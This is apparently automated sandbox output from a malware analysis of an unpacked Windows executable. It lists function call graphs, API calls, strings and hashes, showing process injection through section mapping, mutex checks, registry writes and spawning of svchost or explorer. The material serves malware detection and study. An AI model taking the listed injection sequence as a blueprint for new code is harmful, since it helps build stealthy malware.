OpenMutexW 20745->20746 20747 41cc0b 20745->20747 20749 41cc45 20746->20749 20746->20752 20748 41cfdb 20747->20748 20748->19744 20749->20752 21019 4041b0 20749->21019 20751->20752 20752->20751 21098 417c20 20752->21098 20753 41cc5d 20753->20752 21023 4145d0 GetModuleHandleW GetProcAddress GetProcAddress 20753->21023 20758 41cf84 20760 41cf94 20758->20760 20761 41cf8a CloseHandle 20758->20761 20759 41cf77 CloseHandle 20759->20758 20763 41cfba 20760->20763 20764 41cfae CloseHandle 20760->20764 20761->20760 20765 41cfc0 LocalFree 20763->20765 20766 41cfca 20763->20766 20764->20763 20765->20766 20766->20748 20767 41cfd3 ExitProcess 20766->20767 20768 41cc96 20768->20752 21051 404570 20768->21051 20773 41cce2 CreateMutexW 20773->20747 20774 41ccff 20773->20774 20775 41d590 2 API calls 20774->20775 20776 41cd10 20775->20776 21066 4088c0 20776->21066 20779 41cd24 CreateMutexW 20779->20747 20780 41cd41 20779->20780 20781 41d590 2 API calls 20780->20781 20782 41cd52 20781->20782 21073 4089c0 LocalAlloc 20782->21073 20785 41cd66 CreateMutexW 20785->20747 20786 41cd83 20785->20786 20787 41d590 2 API calls 20786->20787 20792 41cd94 20787->20792 20788 41cea5 WaitForSingleObject 20788->20751 20789 41ceb8 WaitForMultipleObjects SetEvent 20789->20751 20790 41cdef 20794 41ce04 20790->20794 21094 4069f0 20790->21094 20792->20790 20792->20794 21086 4081e0 20792->21086 20794->20788 20794->20789 20796 40cc0d lstrcmpiW 20795->20796 20797 40cc35 lstrcmpiW 20796->20797 20827 401191 20796->20827 20798 40cd16 lstrcmpiW 20797->20798 20797->20827 20799 40cd30 OpenMutexW 20798->20799 20800 40cdf5 lstrcmpiW 20798->20800 20801 40cd64 OpenMutexW 20799->20801 20802 40cd4b 20799->20802 20803 40cece lstrcmpiW 20800->20803 20804 40ce0f OpenMutexW 20800->20804 20808 40cd7f 20801->20808 20802->20801 20807 40cee4 20803->20807 20803->20827 20805 40ce43 OpenMutexW 20804->20805 20806 40ce2a 20804->20806 20811 40ce5e 20805->20811 20806->20805 20809 40cf27 Sleep 20807->20809 20810 40ceed OpenMutexW 
20807->20810 20812 40cda1 OpenMutexW 20808->20812 20813 40cddb Sleep 20808->20813 20816 40cd8b 20808->20816 20809->20827 20814 40cf23 20810->20814 20815 40cf0f Sleep 20810->20815 20819 40ce80 OpenMutexW 20811->20819 20820 40ceba Sleep 20811->20820 20821 40ce6a 20811->20821 20817 40cdc3 Sleep 20812->20817 20818 40cdd7 20812->20818 20813->20827 20814->20809 20815->20807 20816->20808 20817->20808 20818->20813 20822 40cea2 Sleep 20819->20822 20823 40ceb6 20819->20823 20820->20827 20821->20811 20822->20811 20823->20820 20827->19747 20827->19748 20829 401331 20828->20829 20831 41d5d0 LocalFree 20828->20831 20829->19775 20831->20829 20833 40c5a1 GetModuleFileNameW 20832->20833 20835 401556 20832->20835 20834 40c5bf LoadLibraryW 20833->20834 20836 40c5bb 20833->20836 20834->20836 20837 40c5dd GetModuleFileNameW 20834->20837 20838 418640 20835->20838 20836->20835 20837->20836 20839 401567 20838->20839 20840 41864c CreateMutexW 20838->20840 20842 407fe0 20839->20842 20840->20839 20841 418669 20840->20841 20841->20839 20843 42466a __snwprintf 102 API calls 20842->20843 20844 408004 RegCreateKeyExW 20843->20844 20845 408034 RegCloseKey 20844->20845 20850 401578 20844->20850 20846 40804b _memset 20845->20846 20847 4080a0 104 API calls 20846->20847 20848 408057 20847->20848 20848->20850 22124 408150 20848->22124 20851 406bc0 20850->20851 20852 406bf9 _memset 20851->20852 20853 401589 20852->20853 22129 41d650 CreateFileW 20852->22129 20861 406ae0 20853->20861 20856 42466a __snwprintf 102 API calls 20857 406c5c RegOpenKeyExW 20856->20857 20857->20853 20858 406c83 RegSetValueExW 20857->20858 20858->20853 20859 406cab LocalFree 20858->20859 20859->20853 20862 406b05 _memset 20861->20862 20863 42466a __snwprintf 102 API calls 20862->20863 20866 40159a 20862->20866 20864 406b3f 20863->20864 20865 406b66 lstrlenW RegSetValueExW 20864->20865 20864->20866 20865->20866 20866->19793 20866->19794 20868 40ca79 20867->20868 20869 40ca81 LocalAlloc 20868->20869 20870 4015d2 20868->20870 
20869->20870 20871 40ca9b 20869->20871 20870->19798 20983 40f470 20870->20983 20871->20870 20872 40cad2 CreateDirectoryW 20871->20872 20872->20870 20874 4246a0 20873->20874 20875 424688 20873->20875 20877 4246c4 20874->20877 20879 4246af 20874->20879 20876 4283ae ___strgtold12_l 66 API calls 20875->20876 20878 42468d 20876->20878 22138 42760a 20877->22138 20880 42835c ___strgtold12_l 11 API calls 20878->20880 20881 4283ae ___strgtold12_l 66 API calls 20879->20881 20886 401709 20880->20886 20883 4246b4 20881->20883 20885 42835c ___strgtold12_l 11 API calls 20883->20885 20885->20886 20886->19811 20887 424705 20887->20886 20889 427410 __flsbuf 97 API calls 20887->20889 20888 427410 __flsbuf 97 API calls 20888->20887 20889->20886 20891 410d5f Wow64DisableWow64FsRedirection 20890->20891 20892 410d8b _memset 20891->20892 20893 410dc5 CreateProcessW 20892->20893 20894 4115e4 Wow64DisableWow64FsRedirection 20893->20894 20895 410e19 NtCreateSection 20893->20895 20898 4115f3 20894->20898 20896 410ea4 GetCurrentProcess NtMapViewOfSection 20895->20896 20897 4115ca CloseHandle CloseHandle 20895->20897 20899 410ef9 NtMapViewOfSection 20896->20899 20915 41151a 20896->20915 20897->20894 20898->19823 20900 410f44 NtCreateSection 20899->20900 20899->20915 20901 410f9f GetCurrentProcess NtMapViewOfSection 20900->20901 20900->20915 20902 410ff6 NtMapViewOfSection 20901->20902 20901->20915 20902->20915 20915->20897 20920 401218 20919->20920 20920->19753 20920->19769 20922 401c98 _memset 20921->20922 20923 41d2c0 3 API calls 20922->20923 20934 401f57 20922->20934 20924 401d02 20923->20924 20925 401d07 20924->20925 20926 401d29 20924->20926 20927 42466a __snwprintf 102 API calls 20925->20927 20928 42466a __snwprintf 102 API calls 20926->20928 20929 401d24 _memset 20927->20929 20928->20929 20930 401dac GetModuleHandleW 20929->20930 20929->20934 20931 401dcf 11 API calls 20930->20931 20933 406db0 2 API calls 20931->20933 20933->20934 20934->19778 20937 41405f _wcscat 20935->20937 20936 
41446a 20936->19774 20937->20936 20938 4140df 20937->20938 20939 41412e 20937->20939 20940 42466a __snwprintf 102 API calls 20938->20940 20941 414147 20939->20941 20942 4141ec 20939->20942 20954 414109 _wcscat 20940->20954 20949 42466a __snwprintf 102 API calls 20941->20949 20941->20954 20943 41427e 20942->20943 20945 414201 20942->20945 20944 414310 20943->20944 20946 414293 20943->20946 20950 4143d8 20944->20950 20952 414329 20944->20952 20947 42466a __snwprintf 102 API calls 20945->20947 20945->20954 20948 42466a __snwprintf 102 API calls 20946->20948 20946->20954 20947->20954 20948->20954 20949->20954 20951 42466a __snwprintf 102 API calls 20950->20951 20950->20954 20951->20954 20953 42466a __snwprintf 102 API calls 20952->20953 20952->20954 20953->20954 20954->19774 20956 4144a6 20955->20956 20957 418a30 5 API calls 20956->20957 20960 414522 _memset 20956->20960 20958 414506 20957->20958 20959 42466a __snwprintf 102 API calls 20958->20959 20959->20960 20960->19780 20962 40c986 20961->20962 20963 40c9d2 lstrlenW lstrlenW 20962->20963 20964 40ca4b 20962->20964 20965 40ca08 20963->20965 20964->19799 20965->20964 20966 42466a __snwprintf 102 API calls 20965->20966 20967 40ca2f lstrlenW 20966->20967 20967->20964 20969 40c970 105 API calls 20968->20969 20970 40c63d 20969->20970 20971 40c64d CreateDirectoryW 20970->20971 20980 4015b9 20970->20980 20972 40c65e 20971->20972 20973 40c689 wsprintfW GetModuleFileNameW 20972->20973 20972->20980 20974 40c6d8 20973->20974 20973->20980 20975 41d650 7 API calls 20974->20975 20976 40c6eb 20975->20976 20977 40c701 CreateFileW 20976->20977 20976->20980 20978 40c733 20977->20978 20979 40c75c WriteFile 20978->20979 20978->20980 20979->20980 20982 40c7e3 DeleteFileW 20979->20982 20980->19793 20982->20980 20984 40c970 105 API calls 20983->20984 20985 40f484 20984->20985 20986 42466a __snwprintf 102 API calls 20985->20986 20991 40f558 _memset 20985->20991 20987 40f4d1 20986->20987 20988 40f507 lstrcmpiW 20987->20988 20987->20991 20989 
40f51d 20988->20989 20988->20991 20990 42466a __snwprintf 102 API calls 20989->20990 20989->20991 20990->20991 20991->19798 20993 401633 20992->20993 20994 41de1c 20992->20994 20993->19805 20993->19806 20995 41de31 LocalAlloc 20994->20995 20996 41de7a LocalFree 20994->20996 20995->20996 20997 41de46 20995->20997 20996->20993 20997->20993 20998 41de70 LocalFree 20997->20998 20998->20996 21000 40d7fd __write_nolock 20999->21000 22238 40f3d0 21000->22238 21003 40d81d lstrcpyW 21004 40d83f 21003->21004 21005 40d8c2 7 API calls 21004->21005 21014 40e0b2 21004->21014 21006 40d964 21005->21006 21005->21014 21006->21014 21014->19815 21018 4084c5 GetModuleFileNameW 21017->21018 21018->20731 21018->20742 21020 4041bc 21019->21020 21021 4041c5 21020->21021 21022 404207 CreateThread 21020->21022 21021->20753 21022->21021 21129 4042e0 21022->21129 21024 414610 21023->21024 21024->20752 21025 4179e0 lstrlenW 21024->21025 21026 4179f8 CreateEventW 21025->21026 21033 417a37 21025->21033 21027 417a14 CreateThread 21026->21027 21026->21033 21029 417a3b LocalFree 21027->21029 21027->21033 21726 408670 21027->21726 21028 417b2d 21031 417b3b 21028->21031 21363 40ee20 21028->21363 21029->21033 21034 417b49 21031->21034 21378 41bcb0 CreateThread 21031->21378 21035 40c970 105 API calls 21033->21035 21050 417b0f 21033->21050 21380 416a30 21034->21380 21041 417a91 _memset 21035->21041 21039 417b5c CreateEventW 21040 417b78 CreateThread 21039->21040 21044 417b9b 21039->21044 21042 417b9d CloseHandle 21040->21042 21040->21044 21701 40bca0 21040->21701 21045 42466a __snwprintf 102 API calls 21041->21045 21041->21050 21042->21044 21043 417c03 21043->20768 21044->21043 21046 417be0 CreateThread 21044->21046 21047 417bc6 CreateThread 21044->21047 21048 417ae4 21045->21048 21046->21043 21731 422100 OpenEventW 21046->21731 21047->21046 21782 41c690 CreateEventW 21047->21782 21298 407280 21048->21298 21050->21028 21360 40f0b0 21050->21360 21052 404583 21051->21052 21055 40457c 21051->21055 22112 
4046c0 21052->22112 21055->20752 21059 4087c0 21055->21059 21058 4046c0 102 API calls 21058->21055 21060 4087d3 21059->21060 21061 408829 GetWindowsDirectoryW 21060->21061 21065 408868 21060->21065 21062 40883c 21061->21062 21061->21065 21063 42466a __snwprintf 102 API calls 21062->21063 21064 408853 lstrcmpiW 21063->21064 21064->21065 21065->20773 21065->20774 21068 4088d3 21066->21068 21067 408968 21067->20779 21067->20780 21068->21067 21069 408929 GetSystemDirectoryW 21068->21069 21069->21067 21070 40893c 21069->21070 21071 42466a __snwprintf 102 API calls 21070->21071 21072 408953 lstrcmpiW 21071->21072 21072->21067 21074 4089e0 LocalAlloc 21073->21074 21075 408aab 21073->21075 21076 408aa1 LocalFree 21074->21076 21077 4089fa LocalAlloc 21074->21077 21075->20785 21075->20786 21076->21075 21078 408a14 GetModuleFileNameW 21077->21078 21079 408a97 LocalFree 21077->21079 21080 408a29 GetSystemDirectoryW 21078->21080 21081 408a8d LocalFree 21078->21081 21079->21076 21080->21081 21082 408a3c 21080->21082 21081->21079 21083 42466a __snwprintf 102 API calls 21082->21083 21084 408a53 lstrcmpiW 21083->21084 21084->21081 21085 408a68 LocalFree LocalFree LocalFree 21084->21085 21085->21075 21087 408205 _memset 21086->21087 21088 40c970 105 API calls 21087->21088 21089 408238 21088->21089 21090 42466a __snwprintf 102 API calls 21089->21090 21093 408290 21089->21093 21091 40826b 21090->21091 21092 42466a __snwprintf 102 API calls 21091->21092 21092->21093 21093->20792 21095 406a0d _memset 21094->21095 21096 42466a __snwprintf 102 API calls 21095->21096 21097 406a54 21095->21097 21096->21097 21097->20794 21099 417c42 21098->21099 21100 417c36 SetEvent 21098->21100 21101 417c4b WaitForSingleObject 21099->21101 21102 417c5a 21099->21102 21100->21099 21101->21102 21103 417c70 21102->21103 21104 417c63 CloseHandle 21102->21104 21105 417c85 21103->21105 21106 417c79 SetEvent 21103->21106 21104->21103 21107 417c9d 21105->21107 21108 417c8e WaitForSingleObject 21105->21108 
21106->21105 21109 417cb3 21107->21109 21110 417ca6 CloseHandle 21107->21110 21108->21107 21111 417cc8 21109->21111 21112 417cbc CloseHandle 21109->21112 21110->21109 21113 417cd1 SetEvent 21111->21113 21114 417cde 21111->21114 21112->21111 21113->21114 21115 417ce7 WaitForSingleObject 21114->21115 21116 417cf6 21114->21116 21115->21116 21117 417d0b 21116->21117 21118 417cff CloseHandle 21116->21118 21119 417d21 21117->21119 21120 417d14 SetEvent 21117->21120 21118->21117 21121 417d39 21119->21121 21122 417d2a WaitForSingleObject 21119->21122 21120->21119 21123 417d42 CloseHandle 21121->21123 21124 417d4e 21121->21124 21122->21121 21123->21124 21125 417d64 21124->21125 21126 417d57 CloseHandle 21124->21126 22119 41bcf0 21125->22119 21126->21125 21130 4042e6 21129->21130 21133 404352 21130->21133 21134 408310 21130->21134 21143 4134d0 21130->21143 21135 40c970 105 API calls 21134->21135 21136 40832b 21135->21136 21137 40834c GetLastError 21136->21137 21138 40835d 21136->21138 21142 4083db 21136->21142 21137->21138 21137->21142 21139 42466a __snwprintf 102 API calls 21138->21139 21138->21142 21140 408393 21139->21140 21140->21142 21171 406cf0 21140->21171 21142->21130 21144 4134dd __write_nolock 21143->21144 21147 413575 21144->21147 21174 418a30 21144->21174 21148 41368e 21147->21148 21182 418da0 21147->21182 21190 40fcb0 21148->21190 21152 4137cd 21205 40f950 21152->21205 21154 4137d2 21210 40f600 21154->21210 21158 40c970 105 API calls 21160 4138fc _memset 21158->21160 21159 413c8a 21159->21130 21160->21159 21162 42466a __snwprintf 102 API calls 21160->21162 21161 413804 _memset 21161->21158 21163 413953 _memset 21162->21163 21163->21159 21164 4139b7 21163->21164 21165 4139db 21163->21165 21166 42466a __snwprintf 102 API calls 21164->21166 21167 42466a __snwprintf 102 API calls 21165->21167 21168 4139d6 _memset 21166->21168 21167->21168 21168->21159 21169 413b54 9 API calls 21168->21169 21242 406db0 21169->21242 21172 42466a __snwprintf 102 API calls 21171->21172 
21173 406d18 21172->21173 21173->21142 21175 418af2 21174->21175 21176 418a48 21174->21176 21179 418b51 LocalAlloc 21175->21179 21181 418a6a _memset _memmove 21175->21181 21177 418a9a lstrlenW LocalAlloc 21176->21177 21178 418a4e lstrlenW 21176->21178 21180 418ad5 lstrcpyW 21177->21180 21177->21181 21178->21181 21179->21181 21180->21181 21181->21144 21183 418e60 21182->21183 21184 418db8 21182->21184 21187 418eb8 LocalAlloc 21183->21187 21189 418dda _memset _memmove 21183->21189 21185 418e09 lstrlenA LocalAlloc 21184->21185 21186 418dbe lstrlenA 21184->21186 21188 418e43 lstrcpyA 21185->21188 21185->21189 21186->21189 21187->21189 21188->21189 21189->21147 21191 40fcc3 21190->21191 21195 40fdd9 21190->21195 21192 42466a __snwprintf 102 API calls 21191->21192 21194 40fd23 21191->21194 21193 40fd0c DeleteFileW 21192->21193 21193->21194 21194->21195 21196 42466a __snwprintf 102 API calls 21194->21196 21200 40fa70 21195->21200 21197 40fd7e 21196->21197 21197->21195 21198 42466a __snwprintf 102 API calls 21197->21198 21199 40fdb8 DeleteFileW RemoveDirectoryW 21198->21199 21199->21195 21201 40fa95 21200->21201 21202 42466a __snwprintf 102 API calls 21201->21202 21204 40fbbf _memset 21201->21204 21203 40fb74 lstrlenW 21202->21203 21203->21204 21204->21152 21206 40f969 21205->21206 21207 42466a __snwprintf 102 API calls 21206->21207 21209 40f9ec _memset 21206->21209 21208 40f9b6 lstrlenW 21207->21208 21208->21209 21209->21154 21211 40f636 21210->21211 21212 40f65c CoCreateInstance 21211->21212 21230 40f63f 21211->21230 21213 40f685 21212->21213 21212->21230 21248 413fa0 VariantInit 21213->21248 21215 40f68d 21249 413fa0 VariantInit 21215->21249 21217 40f6cb 21250 413fa0 VariantInit 21217->21250 21219 40f706 21251 413fa0 VariantInit 21219->21251 21221 40f744 21252 414010 VariantClear 21221->21252 21223 40f819 21253 414010 VariantClear 21223->21253 21225 40f825 21254 414010 VariantClear 21225->21254 21227 40f831 21255 414010 VariantClear 21227->21255 21229 40f840 
21229->21230 21256 413d40 21229->21256 21238 40cb60 21230->21238 21232 40f85f 21261 413dd0 21232->21261 21235 413d40 78 API calls 21236 40f8c0 21235->21236 21239 40cb79 21238->21239 21240 40cbd5 21239->21240 21241 40cbbc lstrlenW 21239->21241 21240->21161 21241->21240 21243 406dbf _memset 21242->21243 21244 406e64 GetCurrentProcess 21243->21244 21247 406f74 _memset _memmove 21243->21247 21245 406e96 _memmove 21244->21245 21246 406f33 GetCurrentProcess 21245->21246 21245->21247 21246->21247 21247->21159 21248->21215 21249->21217 21250->21219 21251->21221 21252->21223 21253->21225 21254->21227 21255->21229 21264 413f20 21256->21264 21260 413d84 21260->21232 21287 413e20 21261->21287 21269 425298 21264->21269 21267 413e50 SysAllocString 21268 413e82 21267->21268 21268->21260 21271 4252a2 21269->21271 21270 4256b9 _malloc 66 API calls 21270->21271 21271->21270 21272 413d65 21271->21272 21273 429888 _malloc DecodePointer 21271->21273 21276 4252be std::exception::exception 21271->21276 21272->21260 21272->21267 21273->21271 21274 4252fc 21281 42547f 21274->21281 21276->21274 21278 429862 __cinit 76 API calls 21276->21278 21278->21274 21280 425317 21282 425418 std::exception::operator= 66 API calls 21281->21282 21283 425306 21282->21283 21284 42524c 21283->21284 21285 425281 RaiseException 21284->21285 21286 425275 21284->21286 21285->21280 21286->21285 21288 413e2f 21287->21288 21290 40f8a7 21287->21290 21291 413ea0 InterlockedDecrement 21288->21291 21290->21230 21290->21235 21292 413ebf 21291->21292 21294 413edb 21291->21294 21292->21294 21294->21290 21299 4072c4 _memset 21298->21299 21300 418a30 5 API calls 21299->21300 21301 4072e6 _memset 21300->21301 21302 418a30 5 API calls 21301->21302 21303 407332 21302->21303 21304 40739c CoCreateInstance 21303->21304 21322 407369 21303->21322 21305 4073cb 21304->21305 21304->21322 21401 413fa0 VariantInit 21305->21401 21307 4073d6 21402 413fa0 VariantInit 21307->21402 21309 407423 21403 413fa0 VariantInit 21309->21403 21311 
                          APIs
                          • LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 0041914E
                          • GetProcAddress.KERNEL32(00000000,?), ref: 004191B1
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: 5$ADVAPI32.DLL$CRYPT32.DLL$DBGHELP.DLL$GDI32.DLL$GDIPLUS.DLL$H$KERNEL32.DLL$MSI.DLL$NTDLL.DLL$OLE32.DLL$SECUR32.DLL$SHELL32.DLL$SHLWAPI.DLL$USER32.DLL$WINHTTP.DLL$WINMM.DLL$WS2_32.DLL$WTSAPI32.DLL$n
                          • API String ID: 2574300362-974314553
                          • Opcode ID: e3e430002b83255cd6f266c08fed002abc7ad3ddd8e6806b3d6c52b59139a0f8
                          • Instruction ID: 5af6799f9cb66f22ec2950afe87d39a47128ff56e9053586588cc2c6fa206a1d
                          • Opcode Fuzzy Hash: e3e430002b83255cd6f266c08fed002abc7ad3ddd8e6806b3d6c52b59139a0f8
                          • Instruction Fuzzy Hash: 8AA23774A05218EFCB14CF64DC94BEAB7B5BB48305F1054AAE50AA3340D778AEC1CF5A

                          APIs
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00410D69
                          • _memset.LIBCMT ref: 00410D86
                            • Part of subcall function 00401C50: _wcsrchr.LIBCMT ref: 00401C5C
                          • _memset.LIBCMT ref: 00410DC0
                          • CreateProcessW.KERNELBASE(0047BCD2,00000000,00000000,00000000,00000000,00000004,00000000,?,00000044,?), ref: 00410E0A
                          • NtCreateSection.NTDLL(00000000,00000006,00000000,000005F0,00000004,08000000,00000000), ref: 00410E8B
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,000005F0,00000002,00000000,00000004), ref: 00410ED2
                          • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 00410EE0
                          • NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,000005F0,00000002,00000000,00000004), ref: 00410F2B
                          • NtCreateSection.NTDLL(00000000,0000000E,00000000,?,00000040,08000000,00000000), ref: 00410F86
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00410FCF
                          • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 00410FDD
                          • NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00411028
                          • NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 00411077
                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 004110BD
                          • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 004110CB
                          • NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 00411116
                          • _memmove.LIBCMT ref: 0041113E
                          • _memmove.LIBCMT ref: 00411177
                          • _memmove.LIBCMT ref: 004111B0
                          • lstrcpyW.KERNEL32(?,KERNEL32.DLL), ref: 004111D0
                          • lstrcpyW.KERNEL32(?,USER32.DLL), ref: 004111E8
                          • lstrcpyA.KERNEL32(?,LoadLibraryW), ref: 00411200
                          • lstrcpyA.KERNEL32(?,GetProcAddress), ref: 00411217
                          • lstrcpyA.KERNEL32(?,Sleep), ref: 0041122F
                          • lstrcpyA.KERNEL32(?,LoadLibraryA), ref: 00411247
                          • lstrcpyA.KERNEL32(?,LocalAlloc), ref: 0041125E
                          • lstrcpyA.KERNEL32(?,VirtualAlloc), ref: 00411276
                          • lstrcpyA.KERNEL32(?,LocalFree), ref: 0041128E
                          • lstrcpyA.KERNEL32(?,CloseHandle), ref: 004112A5
                          • lstrcpyA.KERNEL32(?,VirtualFree), ref: 004112BD
                          • lstrcpyA.KERNEL32(?,MessageBoxW), ref: 004112D5
                          • lstrcpyA.KERNEL32(?,VirtualProtect), ref: 004112EC
                          • _memmove.LIBCMT ref: 00411329
                            • Part of subcall function 00405710: GetCurrentProcess.KERNEL32(0047F5AC,?,00411363), ref: 00405718
                            • Part of subcall function 00405710: IsWow64Process.KERNEL32(00000000,?,00411363), ref: 0040571F
                            • Part of subcall function 00405710: GetProcessHeap.KERNEL32(?,00411363), ref: 00405725
                          • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00411457
                          • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 0041146B
                          • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 0041147F
                          • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00411490
                          • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 004114A1
                          • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 004114B2
                          • NtClose.NTDLL(00000000), ref: 004114BF
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 004114F3
                          • CloseHandle.KERNEL32(?), ref: 004115D1
                          • CloseHandle.KERNEL32(?), ref: 004115DE
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 004115EB
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Section$lstrcpy$View$ProcessWow64$Unmap$CreateCurrent_memmove$CloseDisableRedirection$Handle_memset$Heap_wcsrchr
                          • String ID: 777367648777262762$897878765347627341$CloseHandle$D$GetProcAddress$KERNEL32.DLL$LoadLibraryA$LoadLibraryW$LocalAlloc$LocalFree$MessageBoxW$NTDLL.DLL$RtlCreateUserThread$Sleep$USER32.DLL$VirtualAlloc$VirtualFree$VirtualProtect
                          • API String ID: 851839342-117320160
                          • Opcode ID: b2224f8b226e7ea511b9d734777c03b8a2ab762239ba783e776ab89f80f77c31
                          • Instruction ID: 8e27ae5f55abf712d166e728743ac6ae8c417ed9e92c48e352670e92dcec7a34
                          • Opcode Fuzzy Hash: b2224f8b226e7ea511b9d734777c03b8a2ab762239ba783e776ab89f80f77c31
                          • Instruction Fuzzy Hash: 38323EB5A40218AFDB24DF64DC8DF9AB774EB48704F1045E9B20DA7290DB74AE84CF58
                          APIs
                            • Part of subcall function 00419140: LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 0041914E
                          • ExitProcess.KERNEL32 ref: 0040103B
                          • _memset.LIBCMT ref: 00401058
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 004010A0
                          • CreateMutexW.KERNELBASE(0000000C,00000000,0047B18C), ref: 004010D2
                          • OpenEventW.KERNEL32(00100002,00000000,004797F4), ref: 00401116
                          • ExitProcess.KERNEL32 ref: 00401197
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcessWow64$CreateDisableEventLibraryLoadMutexOpenRedirection_memset
                          • String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe
                          • API String ID: 2030883397-2596767422
                          • Opcode ID: 1b1bdfa044f38bd1d07ea9bd9e2dcf74c9d44c73de0847807d9cb33cb774bd22
                          • Instruction ID: 2ecc7c394b58b1c41625a16d2b29e790adc180c7ad411e2bfa6d88d98b836a10
                          • Opcode Fuzzy Hash: 1b1bdfa044f38bd1d07ea9bd9e2dcf74c9d44c73de0847807d9cb33cb774bd22
                          • Instruction Fuzzy Hash: 8062A2B0A402149FDB249F60EC49B9977B5FB44706F1041BAF60DB62E0DBB99AC4CF19

                          Control-flow Graph

                          control_flow_graph 579 40cbf0-40cc24 GetCommandLineW lstrcmpiW 581 40cc35-40cc49 lstrcmpiW 579->581 582 40cc26-40cc30 579->582 584 40cd16-40cd2a lstrcmpiW 581->584 585 40cc4f-40cc62 581->585 583 40cf39 582->583 586 40cf3e-40cf41 583->586 587 40cd30-40cd49 OpenMutexW 584->587 588 40cdf5-40ce09 lstrcmpiW 584->588 594 40cc64-40cc84 585->594 595 40ccbc 585->595 589 40cd64-40cd7d OpenMutexW 587->589 590 40cd4b-40cd5d 587->590 592 40cece-40cee2 lstrcmpiW 588->592 593 40ce0f-40ce28 OpenMutexW 588->593 599 40cd98-40cd9f 589->599 600 40cd7f-40cd84 589->600 590->589 592->583 598 40cee4-40ceeb 592->598 596 40ce43-40ce5c OpenMutexW 593->596 597 40ce2a-40ce3c 593->597 618 40ccb2 594->618 619 40cc86-40cc92 594->619 609 40ccc4-40cccb 595->609 604 40ce77-40ce7e 596->604 605 40ce5e-40ce63 596->605 597->596 602 40cf27-40cf37 Sleep 598->602 603 40ceed-40cf0d OpenMutexW 598->603 606 40cda1-40cdc1 OpenMutexW 599->606 607 40cddb-40cdeb Sleep 599->607 613 40cd8b-40cd91 600->613 602->586 611 40cf23 603->611 612 40cf0f-40cf21 Sleep 603->612 616 40ce80-40cea0 OpenMutexW 604->616 617 40ceba-40ceca Sleep 604->617 622 40ce6a-40ce70 605->622 614 40cdc3-40cdd5 Sleep 606->614 615 40cdd7 606->615 607->586 620 40cd07-40cd0c 609->620 621 40cccd-40cced 609->621 611->602 612->598 613->599 614->599 615->607 623 40cea2-40ceb4 Sleep 616->623 624 40ceb6 616->624 617->586 627 40ccba 618->627 631 40cc94-40cc9e 619->631 632 40cca6-40ccb0 619->632 620->586 633 40cd03 621->633 634 40ccef-40cd01 621->634 622->604 623->604 624->617 627->609 631->632 632->627 633->620 634->609
                          APIs
                          • GetCommandLineW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401191), ref: 0040CBF6
                          • lstrcmpiW.KERNELBASE(?,0047C02C), ref: 0040CC1C
                          • lstrcmpiW.KERNEL32(?,0047BA14), ref: 0040CC41
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcmpi$CommandLine
                          • String ID:
                          • API String ID: 651898456-0
                          • Opcode ID: 4d93de4eec2aa3969e8e97d8ea455facc18b1b5651a4922261509d52f99a34b8
                          • Instruction ID: 4ddbac3731ada47e5b8fe08fae1d81555edb17e003b0b40b71001650aaa6c5d5
                          • Opcode Fuzzy Hash: 4d93de4eec2aa3969e8e97d8ea455facc18b1b5651a4922261509d52f99a34b8
                          • Instruction Fuzzy Hash: B1915074A04304EBD7189FA4ED8DBAE7B75FB48705F20823AF616B62D0C7B89441CB59

                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset$__snwprintf$Directory$FileModuleNameSystemWindows
                          • String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe
                          • API String ID: 60459999-2596767422
